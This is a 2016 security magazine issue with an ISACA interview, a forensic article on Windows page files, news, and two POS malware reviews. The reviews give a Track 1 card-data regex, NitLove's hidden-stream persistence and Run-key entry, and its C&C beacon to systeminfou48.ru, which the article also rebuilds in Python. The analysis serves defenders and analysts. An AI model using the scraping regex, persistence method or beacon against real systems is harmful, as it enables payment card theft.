Vol.6 Issue 23 - Jan/Feb 2016
Understanding POS (Point-of-Sale) Malware
Interview with Jonathan Brandt, Manager of ISACA’s Cybersecurity Practices
A Guide to Business Continuity Planning www.bluekaizen.org
Contents
Interviews
6 Jonathan Brandt, Manager of ISACA’s Cybersecurity Practices
Grey Hat
10 Virtual Memory Basics: Why Look at PAGEFILE.SYS?
Review
30 A Guide to Business Continuity Planning
Issue 23 | Securitykaizen Magazine | 4
New & News
16 Bluekaizen News
Malware Review
20 Understanding the POS Malware
24 NitLove PoS Malware
Best Practice
35 How to secure your network by using Virtual Desktop Infrastructure
Editor: Mohamed H. Abdel Akher
Contributors: BK Team, James Atonakos, Vijay Lalwani, Mohamed Elhenawy, Khaled Alaa, Waleed Hamouda
Security Kaizen Magazine Readers Everywhere, Welcome!
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Ahmed Mohamed
Design: Medhat A. Albaky
Security Kaizen is issued bi-monthly. Reproduction in whole or in part without written permission is strictly prohibited. All copyrights are reserved to www.bluekaizen.org. For advertisement in Security Kaizen Magazine or on the www.bluekaizen.org website, e-mail info@bluekaizen.org or phone: +2 0100 267 5570 / +971 5695 40127
2016 will be a year of growth for Security Kaizen Magazine as we focus on our commitment to deliver the most professional articles, ranging from beginner to professional level. Every issue will have a theme to make knowledge sharing more effective, and we will try to cover all sectors through different topics across the cyber security domain.
Chairman & Editor-in-Chief Moataz Salah
Editor’s Note
MagazineTeam
The topic of this issue is POS malware: malicious software expressly written to steal customer payment data, especially credit card data, from retail checkout systems. For more details on how POS attacks are carried out and how to protect against them, see our reviews. We also have an interview with Jonathan Brandt, Manager of ISACA’s Cybersecurity Practices, about ISACA’s new technical program, CSX (Cybersecurity Nexus). He also discussed the security market and how CSX will adapt to the most recent attacks in 2016. In addition, we feature a unique article on virtual memory concepts and their importance in the digital forensics process, as well as an important article on business continuity planning, ISO 22301, and preparing for natural disasters. Finally, we are holding a CISSP course on the 7th of February, so make sure to book your seat to attend and earn this well-recognized certificate in the cyber security domain. For more information contact us at training@bluekaizen.org
Moving Forward
Mohamed H. Abdel Akher, Editor of Security Kaizen Magazine
Interviews
Interview with
Jonathan Brandt
Manager of ISACA’s Cybersecurity Practices
Can you please introduce yourself to Security Kaizen Magazine readers (bio, experience, history, etc.)?
As a cybersecurity practices manager for ISACA, Jonathan Brandt works across the organization as a subject matter expert, aiding development of products and offerings that further ISACA’s Cybersecurity Nexus (CSX) portfolio.
BK Team
Prior to joining ISACA, Brandt held various cybersecurity leadership roles within the U.S. Department of Defense throughout his 20 years of military service. Areas of professional focus include multi-discipline security, organizational leadership, project management, training and education, and workforce development.
Can you give us an overview about ISACA? What are the activities? What are the benefits for joining ISACA? ISACA (isaca.org) helps global professionals by offering knowledge, standards, training, networking, credentialing and career development. Established in 1969, ISACA is a nonprofit association of 140,000 professionals in 180 countries. Its members include internal and external auditors, CEOs, CFOs, CIOs, educators, information security and control professionals, business managers, students, and IT consultants. ISACA has more than 200 chapters in more than 80 countries.
ISACA’s industry-leading certifications include: • Certified Information Systems Auditor (CISA) • Certified Information Security Manager (CISM) • Certified in the Governance of Enterprise IT (CGEIT) • Certified in Risk and Information Systems Control (CRISC) ISACA offers the Cybersecurity Nexus (CSX), a holistic cybersecurity resource. The CSX program (www.isaca.org/cyber) has many cybersecurity components, including cybersecurity certificate and certifications—Cybersecurity Fundamentals Certificate, CSX Practitioner Certification, CSX Specialist Certification, CSX Expert Certification, and CISM. ISACA also provides and continually updates COBIT, a business framework to govern enterprise technology.
What types of membership exist in ISACA?
ISACA offers individual memberships for professionals and students.
Recently, ISACA launched the CSX certifications and courses. Can you please give us more details about them? And why did ISACA decide to create CSX?
ISACA builds on its 45 years of global leadership in IT to do for cybersecurity professionals what it has done, and will continue to do, for professionals in IS auditing, control and governance. This was a natural evolution for ISACA to serve its 140,000 professionals worldwide. As a global leader in cybersecurity, ISACA provides tools and training to help create a robust global cybersecurity workforce. ISACA launched the Cybersecurity Nexus (CSX) in 2014 to address the cybersecurity skills crisis through resources for every level of a cybersecurity career.
CSX Certifications and Training CSX Practitioner: Demonstrates ability to serve as a first responder to a cybersecurity incident following established procedures and defined processes. CSX Specialist: Demonstrates effective skills and deep knowledge in one or more of the five areas based closely on the NIST Cybersecurity Framework: Identify, Detect, Protect, Respond and Recover. CSX Expert: Demonstrates ability of a master/expert-level cybersecurity professional who can identify, analyze, respond to, and mitigate complex cybersecurity incidents.
Can you give us any numbers, statistics or research regarding the international shortage of cyber security professionals?
According to ISACA’s 2015 Global Cybersecurity Status Report, 92 percent of respondents whose organizations will be hiring cybersecurity professionals in 2015 say it will be difficult to find skilled candidates. Eighty-three percent believe cyberattacks are a top threat. An alarming 86 percent say there is a global shortage of skilled cybersecurity professionals, and only 38 percent feel prepared to fend off a sophisticated attack.
What differentiates CSX from other cyber security courses in the market?
CSX training and skills verification take place in an adaptive, performance-based cyber lab environment. ISACA is the first to offer PerformanScore, a learning and development tool that measures professionals’ ability to perform cybersecurity tasks based on their problem-solving approach. The tool is unique in its ability to recognize that there are multiple ways to respond to cybersecurity threats, and it compares a professional’s actions against an adaptive scoring rubric in real time. This is the first program to combine skills-based training with performance-based exams for certifications, and it uses a virtual setting with real-world cybersecurity scenarios.
How do you see the future of cyber-attacks, especially in the Middle East region? How will CSX courses help employees be prepared and ready for such attacks?
Cyber attacks will continue and increase in frequency globally. Cyber criminals do not take a holiday. Geopolitical conflicts will continue to spill over into cyberspace in the form of ideologically and politically motivated attacks. Significant amounts of technology, both hardware and software, are imported globally, including cyber security tools. For that reason, supply chain management is critical in thwarting hidden malware, backdoors, flaws and other vulnerabilities. There is always risk, and that translates to an urgent need for skills capable of critically inspecting these products before deployment, especially in critical infrastructure and critical industry sectors. Enterprises should also strengthen cyber security with staff that is trained and certified in cyber security. Developing, and maintaining, strong cyber security skills is a critical part of the solution. CSX certifications and training are designed to help professionals build the skills needed at every level of a career in cyber security. The performance-based training and exams prepare professionals for real-world scenarios and the ever-evolving threat landscape.
What was the overall takeaway of the CSX 2015 North America conference? Do you plan to hold it as a yearly conference?
The CSX 2015 North America conference was sold out, and attendees responded favorably in feedback throughout and after the conference. The CSX conference will be held annually in North America and is expanding globally in 2016.
In 2016, do you expect higher investments in cyber security workforce? According to a survey by ISACA and RSA Conference, State of Cybersecurity: Implications for 2015, 56 percent of organizations responded they will spend more on cybersecurity in 2015, and 63 percent say their executive team provides appropriate funding.
Finally, what is your advice for governments, users and organizations to stay secure?
It is uncommon for an organization not to have a security awareness program. The question is: is the security awareness program effective? 360-degree evaluations can be a useful tool to glean data about your security climate and make adjustments. As threat environments evolve, so too should your security posture. The cybersecurity market is inundated with solutions that often carry expensive price tags. Cybersecurity should be infused into all facets of business, and when a solution has exceeded its usefulness, you cannot be afraid to move on. Lastly, it is critical to stop treating cybersecurity differently. It is technological risk and requires daily hygiene, similar to information, physical and operational security. Many would never leave sensitive information (e.g., salary data) in a common area, leave their doors unlocked at night, or freely give out keys to their home. Yet these are the exact things, in a digital world, that contribute to many incidents.
Grey Hat
Virtual Memory Basics:
Why Look at PAGEFILE.SYS? Introduction Memory, or storage, is essential to the operation of a computer. There are different kinds of memory as well, separated into two categories: • Primary Storage: This is short-term, high-speed, low-capacity memory. Motherboard RAM and the different types of cache contained inside and outside the CPU are used here to store instructions and data.
James Atonakos Forensic Investigator at WhiteHat Forensics
• Secondary Storage: This is long-term, low-speed, high-capacity storage. Hard disk, CD, and DVD media fall into this category. Figure 1 illustrates the flow of instructions and data in a computer. For the CPU to execute a program, the instructions and data that make up the program must be copied from the hard disk into RAM. The CPU only fetches instructions and data from RAM (or cache), never directly from the hard disk.
Once a program (or a portion of it) has been copied into RAM, the CPU begins fetching instructions and data from the memory locations the program was copied into. The CPU always looks inside its internal cache first, to see if the instruction or data it needs is stored there. A cache hit means the instruction or data has been found in the cache; a cache miss means it is not stored there. If there is a miss in the internal cache, the CPU then looks in the external cache. A miss there means the CPU has to load the instruction or data from RAM, which takes the longest access time, because cache access times are much shorter than RAM access times.
To a human being, it appears that all programs are running simultaneously, even though that is impossible with a single CPU. Simultaneous execution is possible, however, when the single CPU has multiple cores, or when there are multiple CPUs in the system; then two or more programs really can run at the same time, each on its own CPU or core. With multiple processes running, the RAM allocated to each program adds up and may exceed the amount of physical RAM installed on the system. For example, suppose there is 2 GB of RAM, but the programs running require 2.4 GB. Where does the extra 400 MB come from? The system “borrows” it from the hard disk. This is the essence of virtual memory: the total amount of memory available to the operating system for running programs equals the amount of RAM plus the amount of “paging” storage available on the hard disk.
Demand-Paging Virtual Memory
Operating systems use a demand-paging virtual memory system to make efficient use of RAM and to support concurrent execution of multiple programs in RAM at the same time. In a paged memory management system, RAM is divided into fixed-size blocks, typically 4 KB in size, called pages. One or more pages are allocated to a program when it is copied into RAM for execution. Note that the entire program does not have to be copied into RAM for it to begin execution. The reason for this will be explained shortly.
Figure 1: The flow of instructions and data in a computer

Data from RAM is then also written into the cache during a miss so that future accesses to the same data will result in hits and better memory performance. Modern operating systems, such as Windows and Linux, support multitasking. This allows multiple programs to run concurrently (but not simultaneously) on one CPU. Concurrent execution of multiple programs means that, over a period of time, all programs have experienced execution time on the CPU. This is accomplished by running one program for a short period of time (called a time slice), then saving all CPU registers, reloading the CPU registers for the next program that will run, and resuming execution of the next program. This way, each program that is “running” gets multiple slices of time every second to execute.
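The hit/miss lookup order described above can be sketched as a toy model. This is illustrative only: the caches here are plain dictionaries, whereas real caches are fixed-size and organized into lines and sets.

```python
# Toy model of the CPU's lookup order: internal (L1) cache first,
# then external (L2) cache, then RAM. Caches are plain dicts here;
# real hardware caches are fixed-size and evict lines.
def fetch(address, l1, l2, ram):
    if address in l1:
        return l1[address], "L1 hit"
    if address in l2:
        value = l2[address]
        l1[address] = value        # promote into L1 for future hits
        return value, "L2 hit"
    value = ram[address]           # slowest path: fetch from RAM
    l2[address] = value            # fill both caches on a miss, so
    l1[address] = value            # the next access is an L1 hit
    return value, "RAM access"
```

A first access to an address reports a RAM access; repeating the same access immediately reports an L1 hit, which is exactly the fill-on-miss behavior the article describes.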
The pages allocated to a program do not all have to be in the same area of RAM. Much like file fragmentation on a disk, program pages may be fragmented as well, and spread out across the RAM memory space. Special registers and tables in the protected-mode architecture of the Intel 80x86 CPU contain pointers to allocated pages so that they may be properly accessed when the CPU is fetching an instruction or data from the required page. Now, consider a program that provides a menu of options when it starts up. Once a user selects a particular menu option, a different section of the program code is executed. This is an example of why it is not necessary to load the entire program into memory at the beginning of its execution. Perhaps only the portion of the program that contains the menu code is loaded into one or more pages. Then, when a user chooses an option, the pages for the program
code that implement that option are loaded. Protected mode provides a way of determining if the instruction or data being fetched by the CPU is present in a page or not. If it is not present, a page fault is generated that causes the operating system to load the necessary program code into a new page. This of course results in a small loss of performance, as the CPU must now wait until the information has been transferred from the hard disk into a RAM page. The benefit here is that a page is not loaded into RAM until it is needed. This is the essence of demand paging. When there is a demand for the page, it is allocated and loaded. But if we just continue allocating and loading pages into RAM, eventually we will run out of free pages. When this happens, we can not have the computer grind to a halt, or give an error because there is not enough RAM to start a program or continue execution of a program. Instead, when a page fault occurs and there are no free pages, a victim page must be chosen to be overwritten by new information from the hard disk. Ideally, a victim page that is never needed again is chosen, but this is not a requirement.
Figure 2(a): Initial state of RAM with multiple processes running

In Figure 2(b), pages A4, E1, and E2 have been loaded into RAM. There are now no free pages left in RAM to allocate.
The victim page may need to be written back to the hard disk before its RAM page is overwritten with new data. The protected-mode architecture keeps track of the status of each page and knows if a page is “dirty,” meaning that it has been modified since being loaded into RAM. A dirty page must be written back to the hard disk; if the page is not dirty, it can simply be overwritten with new data. Let us take a visual look at this process. Figure 2(a) shows a number of running processes (another term for programs) already having pages loaded into RAM. There are a few free pages in RAM still remaining to be allocated as needed. The operating system has not had to use PAGEFILE.SYS yet. PAGEFILE.SYS is the portion of hard disk storage allocated for storage of dirty pages in a Windows environment.
Figure 2(b): New pages have been loaded into RAM

In Figure 2(c), page B3 needs to come into RAM, but since there are no free pages available, a victim page must be chosen. The page replacement algorithm chooses page A1 as the victim. A page replacement algorithm is responsible for keeping track of allocated RAM pages and choosing a victim based on a predetermined metric, such as how long a page has been resident in RAM, how many times it has been accessed, or how long it has been since its last access.
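One common metric mentioned above, time since last access, gives the least-recently-used (LRU) policy. A minimal sketch of LRU victim selection follows; the frame count and page names are illustrative, and page contents are omitted since only residency and recency matter here.

```python
from collections import OrderedDict

# Minimal LRU page-replacement model: RAM has a fixed number of
# frames; on a page fault with no free frame, the victim is the
# resident page whose last access is oldest.
class LRUPager:
    def __init__(self, frames):
        self.frames = frames
        self.resident = OrderedDict()   # pages in order of last access

    def access(self, page):
        """Touch a page; return the victim page if one was evicted."""
        if page in self.resident:
            self.resident.move_to_end(page)   # refresh recency on a hit
            return None                       # hit: no victim needed
        victim = None
        if len(self.resident) >= self.frames:  # fault with RAM full:
            victim, _ = self.resident.popitem(last=False)  # evict LRU
        self.resident[page] = None
        return victim                          # written back first if dirty
```

With three frames and the access sequence A1, B1, C1, A1, D1, the fault on D1 evicts B1, the least recently used page, mirroring the victim choice walked through in the figures.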
The operating system determines that page A1 is dirty and must be written back to disk, so it is written to PAGEFILE.SYS.

Figure 2(c): A victim page needs to be chosen

Once page A1 has been freed up, page B3 can be loaded into RAM, as shown in Figure 2(d).

Figure 2(d): A new page is loaded into RAM

In Figure 2(e), page C4 needs to be loaded into RAM, but there are still no free pages; page D1 is chosen as a victim and, also being dirty, is written back to PAGEFILE.SYS.

Figure 2(e): Another victim page must be chosen

This allows page C4 to be loaded into RAM, as shown in Figure 2(f).

Figure 2(f): Another new page is loaded into RAM
As this paging scenario continues to play out, processes keep needing new pages loaded into RAM, victims continue being swapped back to PAGEFILE.SYS, and after a while we see the state of the system as shown in Figure 2(g).
Figure 2(g): RAM contents and PAGEFILE.SYS contents after multiple page swaps

It is these “dirty” pages stored in PAGEFILE.SYS that are potential sources of good forensic evidence during an investigation. PAGEFILE.SYS is a protected and hidden operating system file, but it is easily accessible to forensic software. The size of PAGEFILE.SYS is typically at least as large as the amount of motherboard RAM. Figure 3(a) shows the current size of the paging file. This can be made larger or smaller by the user by clicking the Change button, which brings up the Virtual Memory paging file size adjustment window, shown in Figure 3(b).
Figure 3(a): Advanced tab in Performance Options shows the virtual memory paging file size
Figure 3(b): Virtual Memory paging file size window

In terms of performance, the larger the page file the better, and the more RAM the better. If there is not enough RAM to adequately support the number of running processes, the operating system can enter a low-performance state called thrashing: page faults occur almost continuously and plenty of swapping goes on, but little actual process execution, because so much time is devoted to swapping.
PAGEFILE.SYS Solves the Case!
So, why does a forensic investigator need to care about PAGEFILE.SYS? Here is an actual example of a forensic investigation in which a case was solved by evidence located in PAGEFILE.SYS. The main goal of the case was to determine whether a computer had accessed a particular file over the network. The forensic investigation did not show any references to the file in the command line history, in recent documents, or in deleted files, nor was the file stored anywhere on the disk partition.
The PAGEFILE.SYS file was processed by a strings program to extract all printable character strings. When the output file was searched, a network path to the
file being searched for was present. This means that the same file path was once resident in a RAM page, and that RAM page was chosen as a victim and written back to PAGEFILE.SYS. If the file path was resident in a RAM page, that indicates the file was accessed in some way by the system, which is the proof being sought in the investigation. Conclusion The evidentiary value of PAGEFILE.SYS has hopefully been demonstrated here. In the same fashion, the Windows HIBERFIL.SYS file can also be a forensic gold mine, as it contains a complete copy of RAM contents at the time a computer was put into hibernation. For Linux investigations, the equivalent to PAGEFILE.SYS is the swap file, where RAM pages are stored when they are replaced. The more a forensic investigator understands about the details of how an operating system functions the better. Knowing the details of how virtual memory is implemented gives the investigator another source of possible evidence that may be important to a case.
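The strings-extraction step used in the case above is easy to reproduce. A minimal sketch follows: it pulls printable ASCII runs out of a raw binary (such as an exported copy of PAGEFILE.SYS) and searches them for a path fragment. The file name and search term are illustrative, and a real page file would need to be read in chunks rather than all at once.

```python
import re

# Minimal re-implementation of the "strings" step: extract runs of
# printable ASCII bytes, then keep only those containing the needle.
def printable_strings(data, min_len=6):
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

def search_dump(path, needle):
    with open(path, "rb") as f:
        data = f.read()              # real page files need chunked reads
    needle = needle.encode()
    return [s.decode() for s in printable_strings(data) if needle in s]
```

Running `search_dump` over an exported page file with a UNC path fragment as the needle would surface any network paths that were once resident in a swapped-out RAM page, just as in the case described.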
Get your printed copy of the magazine at your place by applying for the Gold Membership. For more information, contact member@bluekaizen.org
To send us an article, please email editing@bluekaizen.org
New & News
News: A peek under the hood at the recent security breaches
The end of the bulk telephony metadata program
At midnight on November 29th, two and a half years after Edward Snowden’s revelations, the NSA stopped its bulk collection of telephony metadata once authorized under Section 215 of the USA PATRIOT Act. Under the USA Freedom Act, the NSA will no longer rely on Section 215 to collect all phone records; instead, it will have to request the data from the telecommunications companies that hold it.
BK Team
Windows’ Nemesis: Pre-boot malware targeting payment card data
A financially motivated threat group is targeting payment card data using sophisticated malware that executes before the operating system boots. This rarely seen technique, referred to as a ‘bootkit’, infects lower-level system components, making it very difficult to identify and detect. The malware’s installation location also means it will persist even after the operating system is re-installed, widely considered the most effective way to eradicate malware. As a result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits. The Nemesis malware platform features backdoors that support a variety of network protocols and communication channels for command and control. The cybercrime tool supports file transfer, screen capture, keystroke logging, process injection, process manipulation, and task scheduling.
Report: Scripting languages most vulnerable; cross-site scripting the most common vulnerability
According to an analysis of over 200,000 applications, PHP is the programming language with the most vulnerabilities. The report, by Boston-based security firm Veracode, was released this morning and is based on Veracode’s assessment of more than a trillion lines of code for customers at large and small companies, commercial software suppliers, and open source projects. Overall, scripting languages like PHP had a much higher incidence of vulnerabilities than Java or .NET, said Chris Wysopal, Veracode’s CTO and CISO. “If you have a choice, don’t pick a language like PHP,” he said. “Unfortunately, developers aren’t picking languages based on how secure they are.” The report also showed that SQL injection (SQLi) and cross-site scripting (XSS) are among the Open Web Application Security Project’s (OWASP) Top 10 most critical web application security risks.
Censys, the new search engine for hackers
Censys is a free search engine originally released in October by researchers from the University of Michigan; it is currently powered by Google. Like Shodan, it indexes devices exposed on the Internet, and experts can use it to assess the security those devices implement. “We have found everything from ATMs and bank safes to industrial control systems for power plants. It’s kind of scary,” said Zakir Durumeric, the researcher leading the Censys project at the University of Michigan. John Matherly, founder and CEO of Shodan, says he doesn’t think his coverage is much different, and notes that Shodan currently probes IP addresses in a wider variety of ways than Censys, for example by looking specifically for certain types of control systems. For more details, have a look at their research paper: https://jhalderm.com/pub/papers/censys-ccs15.pdf
The Bluekaizen Gold Membership Program was first released in November 2012 at Cairo Security Camp 2012. The goal of the membership is to provide high-quality services to our members in the cyber security domain through different channels (books, the magazine, events, courses, and others). By 2016, we hope to improve the program further and provide more services to our members. Please fill out our survey so we can serve you better.
https://goo.gl/MvcEJB
Contact us: member@bluekaizen.org
Egypt: +2 010 2085 4994
Dubai: +971 0503047401
Reviews
Malware Review
Understanding the POS (Point-of-sale) Malware
Vijay Lalwani
Security Analyst at Paladion Network
POS (Point-of-sale) Malware and payment card data breaches
Payment card data breaches have become an everyday crime. Today’s attackers use various families of Point of Sale (POS) malware to steal data from POS systems. Industries that use POS devices are the obvious targets of these attacks. Hospitality and retail companies are the top targets, hardly surprising as that is where most POS devices are used. But other sectors, such as healthcare, also process payments and are also at risk.
What is POS malware and how does it steal payment card data?
POS malware (also called a RAM scraper) is a memory-scraping tool that grabs card data stored temporarily in the RAM of a POS system during transactions at point-of-sale terminals, and stores it on the victim’s own system for later retrieval.
The payment card industry has a set of data security standards, known as PCI DSS (Payment Card Industry Data Security Standard), to ensure that all companies that process, store, or transmit credit card information maintain a secure environment. These standards require end-to-end encryption of sensitive payment data when it is transmitted, received, or stored. This payment data, however, is decrypted in the POS system’s RAM for processing, and the RAM is where the scraper strikes. (For the PCI DSS requirements and an overview, visit the official PCI DSS website.)

When a credit card is swiped at the POS system, the data stored on the card is copied temporarily into the POS software’s process memory space in RAM for authentication and transaction processing.

How POS RAM Scraping works
A POS RAM scraper uses regular expressions (regex) to search the process memory space in RAM for Track 1 and Track 2 credit card data. The following is an example regex for parsing Track 1 data:

^%([A-Z])([0-9]{1,19})\^([^\^]{2,26})\^([0-9]{4}|\^)([0-9]{3}|\^)([^\?]+)\?$

Depending on its accuracy, the regex may also gather garbage values from the process memory space. To filter these out, some POS RAM scrapers apply Luhn validation to the card data they gather.
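The Track 1 pattern shown earlier can be exercised against a synthetic memory buffer. This sketch drops the ^/$ line anchors so the pattern can match anywhere inside raw memory, and the buffer uses a standard test card number, not real data.

```python
import re

# Track 1 regex from the article, minus the line anchors, compiled
# as a bytes pattern so it can run over raw process-memory dumps.
TRACK1 = re.compile(
    rb"%([A-Z])([0-9]{1,19})\^([^\^]{2,26})\^"
    rb"([0-9]{4}|\^)([0-9]{3}|\^)([^\?]+)\?"
)

def scan_buffer(buf):
    """Return (format code, PAN, cardholder name) for each match."""
    return [
        (m.group(1).decode(), m.group(2).decode(), m.group(3).decode())
        for m in TRACK1.finditer(buf)
    ]
```

Run over a buffer containing surrounding non-printable bytes, the pattern still locates the embedded track record, which is exactly how a scraper harvests card data from arbitrary process memory.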
Payment card data structure: The magnetic stripe on the back of a payment card has three data tracks, but only Tracks 1 and 2 are used, as defined by International Organization for Standardization (ISO) / International Electrotechnical Commission (IEC) 7813.
PAN and Luhn: The PAN (Primary Account Number) stored on a payment card’s data tracks is anywhere between 16 and 19 digits long and has the following format: MIII-IIAA-AAAA-AAAC. The first six digits are known as the “Issuer Identification Number” (IIN); the first of these is called the “Major Industry Identifier” (MII). Major card networks (Visa, MasterCard, Discover, JCB, AMEX, and others) all have unique IIN ranges that identify which institution issued a card. A: the account number, which can be up to 12 digits. C: the check digit, calculated using the Luhn algorithm. All valid credit card numbers must pass this Luhn validation check.
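The Luhn check described above is simple to implement: walking from the rightmost digit, every second digit is doubled (subtracting 9 when the doubled value exceeds 9), and the total must be divisible by 10. A sketch, using a standard test PAN:

```python
def luhn_valid(pan: str) -> bool:
    """Return True if the PAN passes the Luhn check-digit test."""
    if not pan.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:       # every second digit from the right
            d *= 2
            if d > 9:
                d -= 9       # same as summing the two digits of d
        total += d
    return total % 10 == 0
```

This is the exact filter some scrapers apply to discard regex matches that are not real card numbers.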
Here is where the POS RAM scraper starts its work: it retrieves the list of processes running on the POS system and searches each process’s memory for card data, retrieving the Track 1 and Track 2 data that matches the regex.
POS RAM Scraper variants: The earlier variants of POS RAM scrapers included only the following basic functions:
• Install the malware as a service
• Scan the POS system processes’ RAM for credit card Track 1 and Track 2 data
• Dump the results into a text file
• The text file was then accessed remotely or manually
As time has passed, POS RAM scrapers have targeted larger organizations and gained the capability to perform the following functions:
• Networking functions (exfiltration of stolen card data to a remote server using HTTP, FTP, Tor, etc.)
• Encryption (encrypting the stolen card data before exfiltrating it)
• Bot and kill-switch operation (receiving commands from a C&C server, including commands for uninstalling the malware)
• Multiple exfiltration techniques
Challenges for the attacker: The big challenge for attackers in successfully gathering the data is infecting the POS system with POS malware in the first place. There are many techniques attackers can use to infect POS systems:
• Insider jobs
• Spamming or phishing
• Social engineering
• Lateral movement from existing infections
• Vulnerability exploitation
• Abusing PCI DSS noncompliance
• And many other techniques
Infecting POS systems: Today, many organizations using POS systems have branches in different geographic locations. In these situations, organizations run POS management servers that manage all the POS systems across those locations.
The attackers’ main aim is to compromise this management server, from which they can infect all the POS systems in the different locations. Attackers compromise the server by studying the organization’s network structure, finding a weakness, and using it to gain access to the network; the infection techniques mentioned above serve this purpose. After gaining access to the network, attackers establish communication with their C&C server, perform reconnaissance on the organization’s network, and collect information that will help them compromise the POS management server. Once they succeed, they start infecting the POS systems managed by this server. Attackers also set backdoors so that the C&C server can later issue a command to remove the malware from the POS systems and erase all traces of the infection.
Prevention steps:
Restrict remote access: Limit remote access into POS systems by third-party companies.
Enforce strong password policies: The PCI Compliance Report says that over 25% of companies still use factory defaults.
Reserve POS systems for POS activities: Do not allow staff to use them to browse the web, check email, or play games.
Use two-factor authentication: Stronger passwords would reduce the problem, but two-factor authentication is better.
Reviews
Malware Review
NitLove PoS Malware

Executive Summary
This is an analysis of a packed executable that was identified as NitLove PoS. The malware analysis team performed behavioral and code analysis of the sample. The malware is a Trojan that targets PoS systems: it hides itself on the system and steals credit card information, specifically the Track 1 and Track 2 data held in the RAM of PoS systems. The payment card industry has a set of data security standards known as PCI DSS. These standards require end-to-end encryption of sensitive payment data when it is transmitted, received or stored.
Mohamed Elhenawy Senior Malware Analyst at Eg-CERT
This payment data is decrypted in the PoS terminal's RAM for processing, and the RAM is where the malware strikes: it harvests the clear-text payment data and sends it to a remote command-and-control (C&C) server.
Malware flow chart
Identification:
1. Packed File Identification

File name: NitLove.exe
File size: 252 KB (258,560 bytes)
MD5: b3962f61a4819593233aa5893421c4d1
SHA1: 1deb651f9cded42d32b9167167a091ff88bff75e
SHA256: 2a1f5a04025b7837d187ed8e9aaab7b5fff607327866e9bc9e5da83a84b56dda
Type: Trojan
Packer: Custom
Type of file: Application (Win32 EXE)
File format: Portable Executable (32-bit)
2. Packing detection
Behavior analysis

1. Process activity: starts a new process: wscript "C:\Users\Test\AppData\Local\Temp:defrag.vbs"
2. File activity: creates two hidden files via alternate data streams:
C:\Users\Test\AppData\Local\Temp:defrag.vbs
C:\Users\Test\AppData\Local\Temp:defrag.scr
and then deletes itself.
3. Registry activity: adds a new value named "Defrag" to the Run registry key, with the data: wscript "C:\Users\Test\AppData\Local\Temp:defrag.vbs"
4. Network activity: none observed.

Code analysis
As mentioned, the packing algorithm of this malware is custom, so there is no automated tool to unpack it; it must be unpacked manually. After traversing the code, we reached the instruction that jumps to the malware code.
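Alternate-data-stream paths like the ones above are easy to miss in a casual triage. One quick heuristic when reviewing Run-key persistence entries is to flag any file path that contains a second colon after the drive letter. A minimal sketch (the regex is ours, written for this article, not taken from the sample or any product):

```python
import re

# Flags Windows paths that carry an alternate data stream (a second colon
# after the drive-letter colon), like the Temp:defrag.vbs path this sample uses.
# Illustrative heuristic only, not a production detector.
ADS_PATH = re.compile(r'[A-Za-z]:\\[^:"]*:[^\\/:"]+')

def looks_like_ads(run_key_value: str) -> bool:
    return ADS_PATH.search(run_key_value) is not None

print(looks_like_ads(r'wscript "C:\Users\Test\AppData\Local\Temp:defrag.vbs"'))  # True
print(looks_like_ads(r'"C:\Program Files\Vendor\updater.exe" /quiet'))           # False
```

A normal Run-key value has exactly one colon (in the drive letter), so anything with a stream suffix stands out immediately.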
At the start of the unpacked code, the malware searches its own code for a certain sequence of bytes. After finding the sequence, it reads the length and data of an encoded function, copies and decodes that function on the stack, and then calls it.
The called function resolves the addresses of several APIs that are used to collect system information and to read data from a certain resource; this data, combined with data from the malware itself, is used to generate a new function. Note: one piece of the retrieved information is the BeingDebugged flag, which serves as an anti-debugging technique and must be handled during analysis.
After that, the malware resolves the addresses of some more APIs, modifies part of its code, and jumps to that part. Note: because the packing algorithm is custom, we cannot determine the original entry point (OEP) exactly, so the address the code jumps to can be considered the OEP.
After jumping to the new code, the malware creates a Visual Basic script file and uses the wscript.exe utility to run it at startup via the Run registry key. It creates this file hidden in the Temp path via an alternate data stream: C:\Users\Test\AppData\Local\Temp:defrag.vbs. The malware then adds a new registry value named "Defrag" with the data: wscript "C:\Users\Test\AppData\Local\Temp:defrag.vbs"
After preparing the registry value, the malware reads its command line and checks the number of arguments. If there is only one argument (the path of the malware itself), it copies itself to a hidden .scr file in the Temp path, C:\Users\Test\AppData\Local\Temp:defrag.scr, and runs the copy with its own path as an argument. Because the new file is run without the "-" argument, it deletes the original file and then runs the .vbs file, which in turn runs the new .scr file in the proper way. After starting this new process the malware terminates itself; up to this point we had observed no malicious activity. Analyzing the newly created process, defrag.scr, we found that it acts the same as the original malware, except that it checks for a "-" argument. When we analyzed it with the "-" argument it started its malicious activities, and indeed the .vbs file starts the process with the "-" argument.
Once properly running, the malware reads the MachineGuid from the registry key Software\Microsoft\Cryptography and then starts three threads for its malicious actions.
The 1st thread is responsible for communication with the C&C server. It receives the MachineGuid as a parameter.
The malware reads the computer name and product name and combines them with a hardcoded string to create a new string that will be used in the communication with the C&C server.
POST /derpos/gateway.php HTTP/1.1
User-Agent: nit_love95859283-fafd-4e5a-9fb0b98c5bbb59f2
Host: systeminfou48.ru
It then concatenates the MachineGuid with the name "nit_love" to use as a User-Agent, and initiates a connection to the domain systeminfou48.ru on port 443. The malware sends a POST request to the page derpos/gateway.php containing the previously generated string (computer name and product name).
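The beacon is simple enough to reconstruct from the captured traffic. The sketch below assembles the request the way the fields appear above; the value at the start of the body is copied verbatim from the capture as a stand-in, since we did not reverse the checksum algorithm that produces it:

```python
# Hypothetical reconstruction of the NitLove beacon from the captured
# traffic shown above. The "262E034F" prefix is a stand-in taken from the
# capture, not a reimplementation of the malware's checksum.
machine_guid = "95859283-fafd-4e5a-9fb0b98c5bbb59f2"
computer_name = "WIN-CI5PMPV3JV8"
product_name = "Windows 7 Enterprise"

user_agent = "nit_love" + machine_guid
body = f"262E034FHWAWAWAWA <{computer_name}> <{product_name}>"

request = (
    "POST /derpos/gateway.php HTTP/1.1\r\n"
    f"User-Agent: {user_agent}\r\n"
    "Host: systeminfou48.ru\r\n\r\n"
    + body
)
print("nit_love" in request)  # True
```

Reconstructing the beacon like this is useful for writing network signatures: the "nit_love" User-Agent prefix alone is a strong IDS indicator.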
262E034FHWAWAWAWA <WIN-CI5PMPV3JV8> <Windows 7 Enterprise>

This is a simple view of the connection; the value at the beginning of the sent data is calculated from the machine information. Unfortunately, the C&C server was down, so we could not get more information; the thread simply loops, waiting for a connection to the C&C.

